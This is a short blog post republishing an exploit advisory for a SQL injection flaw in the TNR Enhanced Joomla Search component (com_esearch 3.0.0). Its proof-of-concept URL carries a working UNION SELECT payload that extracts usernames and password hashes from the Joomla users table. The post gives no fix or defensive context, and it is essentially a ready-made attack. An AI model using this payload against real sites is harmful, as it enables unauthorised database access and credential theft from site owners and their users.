Friday, August 12, 2011

TNR Enhanced Joomla Search <= SQL Injection Vulnerability

0








========================================================================================

[o] TNR Enhanced Joomla Search <= SQL Injection Vulnerability

Software : com_esearch ver 3.0.0
Vendor : http://www.tnrjoomla.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Home : http://evilc0de.blogspot.com/

=========================================================================================

[o] Exploit

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]


[o] PoC

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting